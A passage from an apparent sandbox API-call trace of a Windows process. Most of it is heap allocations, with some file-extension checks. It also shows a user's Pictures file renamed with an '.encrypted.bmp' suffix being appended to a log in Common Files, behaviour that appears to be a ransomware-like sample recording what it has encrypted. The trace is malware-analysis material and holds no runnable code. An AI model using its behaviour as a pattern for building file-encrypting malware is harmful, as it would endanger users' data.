Flags=0x0, Size=0x10) returned 0x88cc58 [0039.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.977] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.978] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.978] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.978] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.978] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.978] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.979] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.979] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.979] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0039.979] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.979] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0039.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.979] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0039.979] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2b9b, lpOverlapped=0x0) returned 1 [0039.980] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0039.980] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2b9b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.980] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0039.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.encrypted.bmp\r\n", cchWideChar=111, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 111 [0039.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6f) returned 0x7db300 [0039.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.encrypted.bmp\r\n", cchWideChar=111, lpMultiByteStr=0x7db300, cbMultiByte=111, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.encrypted.bmp\r\n", lpUsedDefaultChar=0x0) returned 111 [0039.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0039.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0039.980] WriteFile (in: hFile=0x128, lpBuffer=0x7db378*, nNumberOfBytesToWrite=0x6e, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7db378*, lpNumberOfBytesWritten=0x6aee3c*=0x6e, lpOverlapped=0x0) returned 1 [0039.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.980] CloseHandle (hObject=0x128) returned 1 [0039.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.983] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0039.983] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.984] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.984] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.984] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.984] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ceb0 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0039.985] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0039.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0039.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0039.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0039.988] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.988] RtlAllocateHeap (HeapHandle=0x770000, 